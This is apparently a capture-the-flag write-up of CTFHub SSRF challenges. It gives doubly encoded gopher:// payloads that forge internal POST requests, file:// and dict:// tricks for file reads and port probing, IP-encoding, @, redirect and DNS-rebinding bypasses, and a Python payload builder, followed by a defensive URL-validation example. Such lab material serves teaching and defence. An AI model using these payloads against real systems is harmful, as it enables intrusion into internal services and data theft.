ctfhub--ssrf
2022-07-19 02:37:00 【jjj34】
1. POST request
First, visit the index file.

The hint on the page says that this endpoint fetches whatever URL it is given with curl; that is the SSRF vulnerability.
There are two files.

The second screenshot shows that we need to send a POST request to /flag.php whose body is the key, and the key is shown in the first screenshot.
Constructing the POST request
Visit the flag.php page and edit the HTML so that the form gets a submit button, as follows

With the submit button in place, enter the key in the input box, submit, and capture the request with Burp Suite.

URL-encode the contents of the captured request.
Encoding site: CTF Online tools - Online URL encode | URL decode (hiencode.com)

The first encoding:
POST%20/flag.php%20HTTP/1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Type%3A%20application/x-www-form-urlencoded%0AContent-Length%3A%2036%0A%20%0Akey%3De9816343438c44ed037dc74e05f02b1c
Here every %0A has to be replaced with %0D%0A (or %0d%0a). The encoder only saw a bare LF at the end of each line, but HTTP header lines are terminated by CRLF (\r\n); some servers tolerate a bare LF, but the only safe choice is to send the CRLF the protocol specifies. The blank line between the headers and the body must also be genuinely empty: the %0A%20%0A above contains a stray space and has to become %0D%0A%0D%0A.
Tip: paste the text into a plain-text editor and use find-and-replace.

After replacing all occurrences:

About the second encoding:
The request is delivered through curl's gopher pseudo-protocol, so it has to be encoded a second time: the web server URL-decodes the url= query parameter once when it parses the request, and curl's gopher handler decodes the selector once more before writing the raw bytes to the socket. Only a doubly encoded request survives both decodings intact.
The second encoding result:
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c
Once the packet is ready it can be sent to flag.php.
Usage:
1. The link: ?url=gopher://127.0.0.1:80/_
2. The doubly encoded request (this one is the complete request as captured by Burp; the key differs from the one above because it came from a fresh challenge instance):
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A101.0%2529%2520Gecko/20100101%2520Firefox/101.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Akey%253D353819242683f9148b813faf1691976e
3. The payload:
?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A101.0%2529%2520Gecko/20100101%2520Firefox/101.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Akey%253D353819242683f9148b813faf1691976e

Supplement: curl pseudo-protocols
1. gopher protocol
The gopher protocol can carry GET and POST requests: capture a GET or POST request and rebuild it as a gopher request.
Use: it can attack intranet FTP, Telnet, Redis and Memcache services, as well as unauthenticated MySQL.
Syntax:
gopher://IP:Port/_{TCP/IP data stream}
{TCP/IP data stream} is the packet you want to send; the leading _ occupies the gopher item-type position and is not sent to the target.
As above, the payload I want to construct is
http://challenge-f34bdf386ecf053f.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/
and _{TCP/IP data stream} is _POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c
(the POST request after double encoding)
Put it all together:
http://challenge-f34bdf386ecf053f.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c
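The whole procedure from section 1 (capture, fix line endings, encode twice, prefix gopher://.../_) and the gopher syntax just described can be done in a few lines of code instead of by hand. The following is an added example, not code from the write-up or from CTFHub; it uses the target, path and key from the write-up, and the key is only a sample value here. Building the request in code avoids the two manual mistakes discussed above (bare LF line endings and a stray space on the blank line) and computes Content-Length itself.

```python
from urllib.parse import quote, unquote

# Added example for the POST-request and gopher sections of the write-up; not part of
# the original page. Target 127.0.0.1:80, path /flag.php and the key are the write-up's
# values; the key is used here only as a constructed sample.


def build_http_request(method, path, host, headers=None, body=""):
    """Assemble a raw HTTP/1.1 request with CRLF line endings and a correct Content-Length."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        lines.append(f"Content-Length: {len(body.encode())}")
    lines.append("")      # the empty line that ends the header block (no stray space)
    lines.append(body)    # body follows the CRLF CRLF
    return "\r\n".join(lines)


def gopher_payload(raw_request, target="127.0.0.1", port=80):
    """Wrap a raw TCP payload in a gopher:// URL for a curl-based SSRF.

    Encoded twice: the web server decodes the url= parameter once, and curl's gopher
    handler decodes the selector once more before writing it to the socket. The leading
    '_' fills the gopher item-type position and is dropped by curl.
    """
    once = quote(raw_request, safe="/")
    twice = quote(once, safe="/")
    return f"gopher://{target}:{port}/_{twice}"


def decode_layers(payload):
    """Return (what curl receives after the server decodes url=, what reaches the socket)."""
    selector = payload.split("/_", 1)[1]
    after_server = unquote(selector)
    on_the_wire = unquote(after_server)
    return after_server, on_the_wire


if __name__ == "__main__":
    raw = build_http_request(
        "POST", "/flag.php", "127.0.0.1:80",
        {"Content-Type": "application/x-www-form-urlencoded"},
        "key=e9816343438c44ed037dc74e05f02b1c",
    )
    url = gopher_payload(raw)
    print("?url=" + url)
    print(repr(decode_layers(url)[1]))   # the exact bytes the target web server will parse
```

decode_layers is there to check a payload before sending it: the second element must be the request exactly as the target should see it, with \r\n after every header line and an empty line before the body. curl appends a final CRLF after the selector, which is harmless for an HTTP request.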
2. file protocol and dict protocol
The file protocol gives arbitrary file reads:
?url=file:///var/www/html/index.php
The dict protocol gives intranet port probing:
?url=dict://127.0.0.1:20/info

Several curl functions
1. curl_init()
Initialises a curl session. The returned handle is used by curl_setopt(), curl_exec() and curl_close().
$ch = curl_init();
2. curl_setopt()
For the full list of options see:
PHP curl_setopt function | Novice tutorial (runoob.com)
Sets an option on a curl transfer. Usage:
Syntax: curl_setopt(resource $ch, int $option, mixed $value)
Taking the ctfhub--ssrf POST request challenge as the example, reading the index.php source (it can be fetched with the file protocol above) shows the following code:
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
// Sets the URL to fetch. It is taken straight from the url parameter with no check on scheme or host, which is the SSRF.
curl_setopt($ch, CURLOPT_HEADER, 0);
// When set to 1 the response headers are included in the output; here it is off.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// Follow any Location: header the server sends. This is what makes the 302 bypass below work. (The description usually pasted here, keep sending the user name and password across redirects even when the host changes, belongs to CURLOPT_UNRESTRICTED_AUTH, not to this option.)
3. curl_exec()
Executes the curl session.
4. curl_close()
Closes the curl session.
URL bypass
1. @ bypass
payload: http://USER@HOST/flag.php (the exact address was mangled in extraction)
The @ syntax: everything before the @ is the user name, and what follows it is the address that is actually visited. A filter that only looks at the text before the @ is fooled.
2. Dotted-decimal notation is blocked: use another base, or localhost
IP address hexadecimal conversion (520101.com)
For example, 127.0.0.1 can also be written as 2130706433 (decimal) or 0x7f000001 (hexadecimal), and curl resolves both to the loopback address.

3. 302 redirect
Online short URL tool - BeJSON.com
Test point: redirection through a short URL. Short URLs exist to shorten long URLs.
Principle: construct a short address for the target. Visiting the short address returns a 302 (temporary redirect) to the original URL. The original url1 leads directly to the IP address, but url1 is long and hard to remember, so a shorter url2 is introduced: we visit url2, url2 redirects to url1, and url1 leads to the IP address. This works here because CURLOPT_FOLLOWLOCATION is enabled in index.php, so curl follows the redirect even though the url parameter itself never contains 127.0.0.1.
4. DNS rebinding
Look at the source code and find the bypass. The idea: the check resolves the attacker's hostname and sees a harmless public address, curl resolves the same name a second time when it connects, and by then the attacker's DNS server answers with 127.0.0.1.
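Every bypass in this section, and the gopher/file/dict tricks before it, exists because index.php hands $_REQUEST['url'] to curl without looking at it. The following is an added example, not code from the write-up or from CTFHub, of the check that closes them; it is in Python (the same language as the payload builder above) rather than PHP, and the function names and the RebindingResolver stand-in are assumptions made for the example. It allow-lists the scheme (no gopher, file or dict), rejects user info (the @ bypass), normalises IP literals with inet_aton() exactly as curl's resolver does (so 2130706433, 0x7f000001, 0177.0.0.1 and 127.1 all come out as 127.0.0.1), and returns the resolved addresses so the caller can connect to them rather than resolving the name a second time (the rebinding window).

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example; not the write-up's or CTFHub's code. This is the validation that
# curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']) in index.php never performs.
# check_url, canonical_ip and RebindingResolver are names chosen for this example.

ALLOWED_SCHEMES = {"http", "https"}   # gopher, file, dict ... are exactly what the challenge abuses


def canonical_ip(host):
    """Return an ipaddress object if `host` is an address literal, else None (it needs DNS).

    ipaddress.ip_address() only parses dotted-decimal, but curl/getaddrinfo fall back to
    inet_aton(), which also accepts 2130706433, 0x7f000001, 0177.0.0.1 and 127.1.
    Normalising with the same libc function is what defeats the "other base" bypass.
    """
    if ":" in host:                      # IPv6 literal; urlsplit already removed the brackets
        try:
            return ipaddress.ip_address(host)
        except ValueError:
            return None
    try:
        packed = socket.inet_aton(host)
    except OSError:
        return None
    return ipaddress.ip_address(socket.inet_ntoa(packed))


def system_resolve(host):
    """Default resolver: every A/AAAA answer, not only the first one."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def check_url(url, resolve=system_resolve):
    """Return ("ok", [pinned IPs]) if the URL may be fetched, otherwise (reason, [])."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme", []
    if parts.username is not None or parts.password is not None:
        return "userinfo", []             # http://anything@127.0.0.1/ : the @ bypass
    host = parts.hostname
    if not host:
        return "nohost", []
    if host.lower() == "localhost":
        return "loopback", []
    literal = canonical_ip(host)
    if literal is not None:
        ips = [literal]
    else:
        try:
            ips = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            return "unresolvable", []
        if not ips:
            return "unresolvable", []
    for ip in ips:
        mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:127.0.0.1 is still loopback
        target = mapped if mapped is not None else ip
        if not target.is_global:                     # loopback, RFC 1918, link-local, ...
            return "internal", []
    # Connect to these addresses (sending the name in the Host header), not to the name
    # again, and re-run check_url on every Location: header instead of letting curl follow it.
    return "ok", [str(ip) for ip in ips]


class RebindingResolver:
    """Constructed stand-in for an attacker's DNS server: public address first, loopback later."""

    def __init__(self, public="93.184.216.34"):
        self.public, self.calls = public, 0

    def __call__(self, host):
        self.calls += 1
        return [self.public] if self.calls == 1 else ["127.0.0.1"]
```

The two RebindingResolver calls show why a one-off check before calling curl is not enough: the first answer passes, the second (what curl would get when it resolves the name itself) is loopback, so the fetch must go to the IPs returned by check_url. In the PHP code itself the equivalent first steps are curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS) and CURLOPT_FOLLOWLOCATION set to 0, which remove the gopher/file/dict and 302 routes even before any host check is written.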